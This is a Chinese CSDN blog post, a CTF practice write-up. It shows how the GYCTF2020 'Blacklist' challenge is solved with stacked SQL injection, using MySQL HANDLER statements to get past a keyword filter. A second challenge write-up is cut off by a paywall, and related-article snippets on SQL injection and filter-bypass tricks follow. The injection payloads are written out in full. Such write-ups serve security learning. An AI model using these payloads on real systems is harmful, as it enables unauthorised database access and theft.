[BUUCTF]刷题记录4

最新推荐文章于 2022-05-23 22:30:14 发布
最新推荐文章于 2022-05-23 22:30:14 发布
阅读量216 收藏
点赞数
分类专栏: 刷题记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51078229/article/details/115369639
版权
这篇博客记录了作者在不同CTF比赛中的解题经历,包括GYCTF2020的Blacklist题目,通过堆叠注入技巧绕过过滤;MRCTF2020的Ez_bypass,利用MD5碰撞和数组绕过双重防御;以及强网杯2019的高明黑客挑战,通过分析大量备份文件找到有效命令执行路径,最终获取flag。
摘要由CSDN通过智能技术生成

[GYCTF2020]Blacklist

强网杯有个这种题目,改表名的
直接堆叠注入
在这里插入图片描述
再看表FlagHere的信息

1';desc FlagHere#

查询记录

1';select flag in FlagHere#

在这里插入图片描述
返回过滤的信息
使用HANDLER来绕过过滤,文档

完整用法:

HANDLER tbl_name OPEN [ [AS] alias]

HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,...)
    [ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST }
    [ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ { FIRST | NEXT }
    [ WHERE where_condition ] [LIMIT ... ]

HANDLER tbl_name CLOSE

在这题我们这样使用:

HANDLER FlagHere OPEN;
HANDLER FlagHere READ FIRST;
HANDLER FlagHere CLOSE;

payload:

1';HANDLER FlagHere OPEN;HANDLER FlagHere READ FIRST;HANDLER FlagHere CLOSE;

在这里插入图片描述

[MRCTF2020]Ez_bypass

这题还是很简单的

include 'flag.php';
$flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}';
if(isset($_GET['gg'])&&isset
最低0.47元/天 解锁文章
huamanggg
关注
专栏目录
CTFHub技能树WEB之信息泄露
滚滚是只小狐狸
03-30 1206
CTFHub技能树WEB之信息泄露官网地址目录遍历PHPINFO备份文件下载网站源码 官网地址 官网引路☞ https://www.ctfhub.com/#/index 目录遍历 启动环境打开页面,发现页面高数点击直接开始找 2. 进来页面后就这这个场景,标题写的“flag_in_here”于是就开始一个目录一个,目录的找吧 3. 然后我再目录1里面找到了一个“falg.txt”文本文件,...
buuctf刷题记录
mackilo的博客
02-16 2979
2022-1-16 reverse2 扔到IDA64里解析, F5生成伪代码 通过分析得出经过一定的变换后与flag进行比较的 查看flag的值,是{hacking_for_fun} 再返回前面看如何对flag进行变换的,将105、114、49转换成值, 箭头所指的函数功能为,把flag中存在的’i’以及’r’转换成’1’,进而得出正确flag。 2022-1-17 内涵的软件 下载好以后发现是乱码的exe文件,拖到ExeinfoPE里查看信息, 没有加壳,用IDA打开,查看main函数 可以看到跳
BUU 刷题记录
qq_53142368的博客
08-30 241
文章目录前言一、Blacklist二、[RoarCTF 2019]Easy Java三、[GXYCTF2019]禁止套娃 前言 一、Blacklist return preg_match("/select|update|delete|drop|insert|where|./i",$inject); 用这个语句查看过滤 发现过滤了这些 过滤了select 堆叠注入 1’;show tables;%23 1’;show columns from FlagHere; %23 由于过滤了prepare和a
BUUCTF[强网杯 2019]随便注 的三种解法
热门推荐
qq_44657899的博客
11-27 2万+
00X01 [强网杯 2019]随便注 1’ or 1=1 #
[GYCTF2020]Blacklist 使用handler函数进行sql堆注入
EC_Carrot的博客
10-26 423
[GYCTF2020]Blacklist 前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 参考了高诺琪师傅的文章:https://www.cnblogs.com/gaonuoqi/p/12398554.html 一、收集信息 过滤了很多东西,过滤了prepare预编译用不了,过滤了alter也是用不了改表、列名。 但可以查看一下表名 1';show tables;# 有两个表,查看一下FlagH
攻防世界WEB 高手进阶区writeup (一)
weixin_44120313的博客
11-15 756
web 15. hide and seek 右键查看源代码 16. guestbook 爆数据库 --dbs 爆表 --tables 爆字段名 --columns 爆数据。–dump LFI 查看网址,可能存在文件包含漏洞 查看源码 读取pages/flag.php文件 读取pages/config.php文件 ...
buuctf刷题记录(4)
weixin_53409153的博客
07-23 246
findit 下载附件,发现是apk,就直接在JBE中打开,然后发现这么一段十六进制数,上脚本跑一下就出来了: 脚本: a=[ 0x70,0x76,0x6B,0x71,0x7B,0x6D,0x31, 0x36,0x34,0x36,0x37,0x35,0x32,0x36, 0x32,0x30,0x33,0x33,0x6C,0x34,0x6D, 0x34,0x39,0x6C,0x6E,0x70,0x37,0x70, 0x39,0x6D,0x6E,0x6B,0x32,0x38,0
buuctf刷题记录(6)
weixin_53409153的博客
08-03 329
[MRCTF2020]Xor 查壳: 拖入IDA中: 跟进,但是我们无法对关键函数sub_401090查看伪代码: 然后我们就直接看: 再函数中可以看到v0和byte_4212c0按位异或,最后得到byte_41EA08就会输出right,然后再查看: 最后再写脚本: a="MSAWB~FXZ:J:`tQJ\"N@ bpdd}8g" s="" for i in range(len(a)): s+=chr(i^ord(a[i])) print (s) 运行得到: MRCTF{@_R3@
buuctf刷题记录(3)
weixin_53409153的博客
07-19 689
[ACTF新生赛2020]rome 首先,还是查壳: 无壳,为32位: 跟进,跳转到交叉应用列表: 然后,在F5查看伪代码: int func() { int result; // eax int v1; // [esp+14h] [ebp-44h] int v2; // [esp+18h] [ebp-40h] int v3; // [esp+1Ch] [ebp-3Ch] int v4; // [esp+20h] [ebp-38h] unsigned __int8 v5; /
Bugku where is flag 番外篇 详解 MISC
fi0stBlooder的博客
07-10 4152
文章目录一、题目二、思路1、解压所有文件2、密码的获取三、复现1、获取密码2、解压:出师表.rar3、使用winhex或者notepad++查看。4、对获取到的数据进行解码。四、总结 我会不定时更新bugku的题目,和大家共同学习,披荆斩棘。日拱一卒,你的付出,终将使你强大。希望大家喜欢,多多点赞收藏谢谢。 一、题目 下载完成后为一个压缩包文件file.rar,将其解压后获得Key.rar和出师表.rar,解压Key.rar获得13个txt结尾的文档,里面为《出师表》,解压出师表.rar时有密码无法解
linux切换root段错误,出现段错误!!!
weixin_33109551的博客
05-12 457
该楼层疑似违规已被系统折叠隐藏此楼查看此楼#include #include #include #include #include GtkWidget *entry_value;GtkWidget *entry_file_path;GtkWidget *label_error;int get_value(char *String )//get the world's value{int i,v...
Buuctfhandler的使用)[强网杯 2019]随便注 1)+([GYCTF2020]Blacklist 1)
m0_64444909的博客
05-23 377
判断闭合方式 方法一.使用(转义字符)\来判断SQL注入的闭合方式,看\斜杠后面跟着的字符,是什么字符,它的闭合字符就是什么,若是没有,就为数字型。 方法二.首先尝试: ?id=1’ ?id=1" 结果一:如果都报错 判断闭合符为:整形闭合。 结果二:如果单引号报错,双引号不报错 继续尝试: ?id=1’ # 结果一:无报错 判断闭合符为:单引号闭合。 结果二:报错 判断闭合符可能为:单引号加括号。 结果三:如果单引号不报错,双引号报错 最后尝试: ?id=1" # 结果一:结果无报错 判断闭合符为:双引号
CTFHub——Web前置技能——信息泄露
weixin_45871855的博客
11-04 772
Web前置技能——信息泄露 01 目录遍历 打开环境 http://challenge-e1eafbcf96a48116.sandbox.ctfhub.com:10080/ 打开后显示flag_in_here从1/到4/遍历(共遍历16次) 在4/4中发现一个flag文件,下载 打开发现 flag:ctfhub{2f852cb240af833196be008a} 02 phpinfo 打开环境 http://challenge-3a5a5c14ae1f940f.sandbox.ctfhub.com:
handler相关学习(二)handler的相关问题
王温暖的博客
02-01 399
本篇接上篇看一些handler的相关问题 消息阻塞和延时 Looper 的阻塞主要是靠 MessageQueue 来实现的,在next()@MessageQuese 进行阻塞,在 enqueueMessage()@MessageQueue 进行唤醒。主要依赖 native 层的 Looper 依靠 epoll 机制进行的。 阻塞和延时,主要是next()中nativePollOnc...
sql注入时带引号屏蔽的怎么处理
Huamang的博客
02-09 5304
写了学长给的一个题目,第一关就是一个sql注入,但是尝试了万能密码是不管用的,因为题目把单引号给过滤掉了,无法使用单引号来闭合 $sql = "SELECT username, password FROM user WHERE username='" .$user ."' && password='" .$pass ."'"; 要想闭合sql语句加上or 1=1#来使判断条件为真,我学到了一个操作:使用\转义 用\转义后面的单引号 在用户名框输入\,密码框输入or 1=1 #,这样提交后,
[ctf.show]命令执行29-54
Huamang的博客
03-01 2448
web 29 代码审计 error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 涉及到一个函数preg_match(): 这个preg_match 函数用于执行一个正则表达式匹配。 看这次的判断是不能出现flag字样,后面的i意思
[CTFSHOW]PHP特性
Huamang的博客
03-19 1795
web 89 include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } 利用数组绕过:/?num[]=0 web 90 include
[CTFSHOW]命令执行55-74
Huamang的博客
03-05 1602
web 55 if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)){ system($c); } }else{ highlight_file(__FILE__); } bin目录: bin为binary的简写主要放置一些 系统的必备执行档例如:cat、cp、chmod df、dmesg、gzip、kill、ls、
[CTFSHOW]反序列化
Huamang的博客
04-27 1136
web257 <?php error_reporting(0); highlight_file(__FILE__); class ctfShowUser{ private $username='xxxxxx'; private $password='xxxxxx'; private $isVip=false; private $class = 'info'; public function __construct(){ $this->c
buuctf web
最新发布
08-15
- *2* [【BUUCTF刷题】Web解题方法总结(一)](https://blog.csdn.net/qq_45834505/article/details/114276572)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

huamanggg

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值